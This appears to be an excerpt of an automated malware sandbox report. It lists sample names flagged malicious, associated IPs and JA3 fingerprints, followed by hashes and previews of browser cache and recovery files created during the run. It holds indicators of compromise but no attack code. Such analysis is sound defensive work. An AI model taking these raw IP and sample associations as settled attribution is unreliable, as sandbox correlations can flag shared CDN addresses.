	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	151.101.1.44
SPECTRAIPSpectraIPBVNL	out.dll	Get hash	malicious	Browse	45.138.24.6
	crypt_3300.dll	Get hash	malicious	Browse	45.138.24.6
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	45.138.24.6
	Online_doc20.01.exe	Get hash	malicious	Browse	45.14.226.121
	P4fZLHrU6d.exe	Get hash	malicious	Browse	45.14.226.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	xDKOaCQQTQ.dll	Get hash	malicious	Browse	151.101.1.44
	4bEUfowOcg.dll	Get hash	malicious	Browse	151.101.1.44
	The Mental Health Center.xlsx	Get hash	malicious	Browse	151.101.1.44
	crypt_l_32.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	151.101.1.44
	Monday, January 25, 2021 222135-ATT+723086453088056636775.htm	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	151.101.1.44
	PAYMENT INFO.xlsx	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IUHEMSR9\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2914
Entropy (8bit):	4.961604295795146
Encrypted:	false
SSDEEP:	48:LoHoHoHoHvHvUHvHvyHvHrHrHrHgHgHgJkCZHgJkCZHgJkCZHgJkCZIHgJkCZA2t:kIIIPPUPPyPLLLAAAJkCZAJkCZAJkCZu
MD5:	DC4E1831691F9F776A24FC240C0E2079
SHA1:	306C5FC8C9A8B65EF6EAA0CE102642E29DAEF3B5
SHA-256:	895E7C2AA46367B6883A19881A74749FCF6BA3595E0C3BC1C6AA239E909253DE
SHA-512:	1E2B5E2D7DE2ECF57A18B79E736249ADA6F36F4CA7CDB69AC4C007D4F3B49CB12BA9FE2277DF34A43E578B0E85F282386FD3A79863F77327AFC89327639E96A9
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /><item name="mntest" value="mntest" ltime="2929878512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /><item name="mntest" value="mntest" ltime="2932238512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2933638512" htime="30864478"

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\T8DRMTJ1\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E9735B9C-6051-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	107304
Entropy (8bit):	2.2842909003108214
Encrypted:	false
SSDEEP:	384:rMJBRUsfn8w0rDQS8edgTa43tLxMyrLT6:f
MD5:	BFFB3701064C0A783B7C1B453520CE7E
SHA1:	934875893A0B902652CF479059EFCF8C2E29DEE4
SHA-256:	CA0B25C76D3D824B8D1B4700126CDB5F26990DF80716A7D6EA14488B852B76C5
SHA-512:	F810315875DF4A2E3FE4256C82CA4072134D1555048B36135738C17F3509910C1E936690FED08E53EBD61FF78931FE24944AB7E25C921E1BA904699C88DD4BC2
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0631AB9B-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28168
Entropy (8bit):	1.9286774120673393
Encrypted:	false
SSDEEP:	192:reZ1QQ6QxkZFjfV2gkW2M6YBUbSlLb9KyA:rqq7rZhkkf6IUbSLbUF
MD5:	AA8EF9FF10ECD5AA01BA1D6339B0BB19
SHA1:	728BE2299686776833DDB8E4FDE968B1564DD242
SHA-256:	70F8A280D73A8C136C63502BA0050B7ACEFDACC034CF9151F9EF47F09DCAA67C
SHA-512:	27CDFE1576A5EF6340819E9F9F6A0E6944296CD962BD8D6EF859A27FCC13C47C59765F02129895DEC633549EE083E2CC440AED898FE6BC670287EF118B06EE52
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0631AB9D-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28696
Entropy (8bit):	1.92134763100001
Encrypted:	false
SSDEEP:	192:rxZWQL6NktFjR2ckWjMCYR79YMEMA9YAr:r3jO2thAIgCY7ewAeo
MD5:	038D4BE1F06E28AC56647B38DD499D13
SHA1:	FD41F6A0181F1B84DAE0D6AC1EE42D510A44FA09
SHA-256:	3325623ABD1845447C00B26FF944F68A2F747418AD6CC5253F5EA75B01E7B6F8
SHA-512:	7A43F467E60E61D57342E7E1582D56F5919EE4FEE9441BCF95C7526D7D44F10F120CFEC43E22D926B6DD94440BD8BC08F9045EF8C4D2B359DD68B118E1FD1B5C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1136F6F8-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28148
Entropy (8bit):	1.9211928865145094
Encrypted:	false
SSDEEP:	192:rKZdQZ6jkWFjR2gkWwMHYF6jiw9u/0sd16qjiw9u/0NGA:r2i0oWhAkFHs2OHTzR
MD5:	8E347E0DC20B923407CB0D0F344828A8
SHA1:	2FE0EC2B55F51F8419121FD501FC7943DC3C2733
SHA-256:	5B0F6ABC60386BDC0983900074EFA2F497C10D7DD4407C460A8BCF9C09AEE33B
SHA-512:	E6BAB75B2338E49048365A4B9D9A0DB858D1270CA604489084A3A43C410C25CAB604A384076B458D7086C1B7B0D3BA775FC7C249FED9923CCE514B6A71D16E93
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{19D679DB-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5846879171314059
Encrypted:	false
SSDEEP:	48:IwUGcprJGwpa1G4pQRGrapbSqurGQpKNG7HpRlsTGIpX2aGApm:rIZjQn6hBSquFAsTl4Fhg
MD5:	81DD56469154C565BDD0B09EA14DAA8A
SHA1:	F2926B365634EC93BAABB9306134D04DA9F62A13
SHA-256:	BD536AAEF6CED63246EAF3983EFDECDA030ED6CF310D069739E1933BE5EBB126
SHA-512:	4A7AA453B10852030C87495F3C00423A0BC331BA7939999B2FFCDE1094792702839A85A131AEC326D87A96C89008BA4C1979B40697F7D1B4BFD1D631C4F7E09A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E9735B9E-6051-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	194358
Entropy (8bit):	3.5870150177823197
Encrypted:	false
SSDEEP:	3072:ihZ/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGtS:VYN
MD5:	942C40333DDE9C525965BFED5A771782
SHA1:	2D08D5EC1783BC34A1A936E604C407F12E0A8B16
SHA-256:	B40612CA8A555FCD610009D0C96F0FFCD5E9C01AEF14072ED3BB267A7B692D49
SHA-512:	F5AB5B45FEFB063084669050C5F7F4A16DC9492A02B14C0D0EB5DBDF181D5EC23D12ACB3017025B7A0CA77C6FBF3B971F9B8AF8F52FB6F53BD008C9D26EE9A44
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.084341224927129
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEt0w5NnWimI002EtM3MHdNMNxOEt0w5NnWimI00OYVbkEtMb:2d6NxOk0wLSZHKd6NxOk0wLSZ7xb
MD5:	549A9E9F7C5D569909BE9404ECCD0D0A
SHA1:	FDC31DDCB299241F930F2FAA1EDA88377BD32A0E
SHA-256:	A954735DBC9E13FB498B49B22D50206243A2769C592C932C67CDDB4214162F4C
SHA-512:	BE08A250098E1B1ACC00576CE5A474181090CE3E4FB760155017684D4DF60CD8AD2D62F137B15CA5DA0293BD681FC3AD943A95D1C5F10794A06E64A78429A15D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.112843863401286
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2knA6dNnWimI002EtM3MHdNMNxe2knA6dNnWimI00OYkak6EtMb:2d6NxrmA6vSZHKd6NxrmA6vSZ7Ja7b
MD5:	B42768EC22969E88016E83366C69FDF9
SHA1:	A7A2ABC275289EBFD465A9068EB351AACB9979C4
SHA-256:	B25356827845E37ADA07986F3650210116BF06CC61844DD98E364103830D9D67
SHA-512:	5C166B89D9F5EC5E166E5F5960FEC423CA39AE1797EF9B432E43F8D2D1D5F4DECAC35460B415D2AA987BDFD8BF5084C6196CC9DDBAD84F0C1C3AD8BA59463DB6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbfdf1b9c,0x01d6f45e</date><accdate>0xbfdf1b9c,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbfdf1b9c,0x01d6f45e</date><accdate>0xbfdf1b9c,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	666
Entropy (8bit):	5.09944246856251
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLt0w5NnWimI002EtM3MHdNMNxvLt0w5NnWimI00OYmZEtMb:2d6Nxv50wLSZHKd6Nxv50wLSZ7Zb
MD5:	F77C3A3C3F0982AB922A845C651CBACB
SHA1:	329D03798A499F6AA7583EEB7A2F9F3337A48902
SHA-256:	766AAA528087F9979A6EEF7B4228432CE9401ED04FEE7013E6096CF0D991F944
SHA-512:	4883405009F0E78EF49BE8C2594C340C6E9FED6AA599100235F0A859AEB332F57791C69CA51F348563CB594FFB8D97AEF9602E51539447F15D44AD745222129D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	651
Entropy (8bit):	5.076514146969856
Encrypted:	false
SSDEEP:	12:TMHdNMNxiA+NnWimI002EtM3MHdNMNxiA+NnWimI00OYd5EtMb:2d6NxXwSZHKd6NxXwSZ7qjb
MD5:	91B1FD2B6D6EBFBBF0655BA7F0902F7C
SHA1:	DF48916E0C62D678CE9E5C321E363F9403FD119F
SHA-256:	5AF897D127888362B736B0F073E344ECA7001B587777702E20E35AE145BC7497
SHA-512:	DB069AF4B9BDA1F9F296E435975BC557E6B897242B1093DAAF143E1ED0F371527DCCB56695794CC160B9461B904FB0D1F2179427DF5C2F8EDEF0FED5CF6F847B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.11334098758519
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwiYNnWimI002EtM3MHdNMNxhGwiYNnWimI00OY8K075EtMb:2d6NxQTeSZHKd6NxQTeSZ7RKajb
MD5:	2D2F539DCDDA060054B569C020DC0D66
SHA1:	4584E04FBB6C9A24B6B572C824CDD180C12A83EB
SHA-256:	EF9EEE621ECDD8916341F1DA63F3648B6FD007D2C63DA57F548F6768DE543FEC
SHA-512:	4ECD9E2C5A13E5EBBE14899465D21E1792669BD518C31DF85CF36730109BD3AFD0FA34D2D2EAEBF12F81E8218E649BD77985F50D1967282B027AD152DB7F7219
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.087750765404467
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nt0w5NnWimI002EtM3MHdNMNx0nt0w5NnWimI00OYxEtMb:2d6Nx0t0wLSZHKd6Nx0t0wLSZ7+b
MD5:	9B6B985577DB643D263972D3A911E8A0
SHA1:	5355022F787164F9B2CCB4A16702281E449D49CF
SHA-256:	F00BEAC9F2483D4400368A01F65113D84264DF72612DC63618DFF16046B55817
SHA-512:	8C980967244A251CE7A7FFE6EF958EF90DAD52A968F47F5DECB7AF689F9F7D9ABB78744A5AB3F59DFB7453C670F6A06E8F193DBDE7C700C2C082A52E5F7EE719
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.100950583010276
Encrypted:	false
SSDEEP:	12:TMHdNMNxxA+NnWimI002EtM3MHdNMNxxA+NnWimI00OY6Kq5EtMb:2d6NxuwSZHKd6NxuwSZ7Xb
MD5:	79F22C1E6EDD658BD056FF697D91CC79
SHA1:	19B0E10778E565950403A09716DB245117A4C70A
SHA-256:	28576E40E38E8DCA5D17FB2D3013F1CDB08708695E3CB701DFF770540EF06911
SHA-512:	E5E31AA6F7E08561FE5D9EC716FAC5644F4F3A13F5F64157D0EEF64969E3B3EEA4372B51BCF43DE0F71DD1D478DFFA8D3DAB7B44143B1DF507A07D39F96EF1C4
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.060240919960796
Encrypted:	false
SSDEEP:	12:TMHdNMNxc06NnWimI002EtM3MHdNMNxc06NnWimI00OYVEtMb:2d6NxpMSZHKd6NxpMSZ7Gb
MD5:	DCC4F8D1A7312D115E18E3166F63847C
SHA1:	4CEAA027F048D12BC3C498329D4A2728E8C3535E
SHA-256:	B96E0326E1C98BF10890ECB7D8A704A555A9EDF77EA21D06342CCEC79BC11BD1
SHA-512:	282202728801A981EDB01020997C514168A0ADDFA442B80E7DD35168533FFB8A4DB1D4076B14F5E6441B58948073EBDA2C8D55B279152F54820BA1A5215CF805
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.062327683559668
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnA+NnWimI002EtM3MHdNMNxfnA+NnWimI00OYe5EtMb:2d6NxowSZHKd6NxowSZ7Fjb
MD5:	0EEDF1FFD5970837E053BC6440C86207
SHA1:	DDC487F012EE90A88DF09B70504055AC54011BEF
SHA-256:	D013BCBA9822B03ACFA3D95E0CEAFDE6F5B1D01B4D1B5A0B17DCAC3DC3E12D1D
SHA-512:	649302424D1CAFAE5740AC4C4EB498D19E181D998CAF6F7C16941375EC28C7359E8312D27F798CCFE3E6D9FF9D2D20066AFF4079EC97033C69C28714C42F438E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\po60zt0\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.0316726630425155
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGgf:u6tWu/6symC+PTCq5TcBUX4bk
MD5:	55A78BA942B78AE6F262E21054F94896
SHA1:	46185D2B3A39C53163088CF51D7291CDC0F4B04F
SHA-256:	4A33E62D579A159BD21617F848B3A6BDDFE6B6BE4BFA5793C867EDA69CFE14FD
SHA-512:	C79674295A9B5D45EB84449F71B58316C0F7F83D57B913D7E234637C11832BDE94702466688D04D097ECEE12664541397B170C368EE4BA71F3C471DC51875B93
Malicious:	false
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ..............`.......`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	downloaded
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
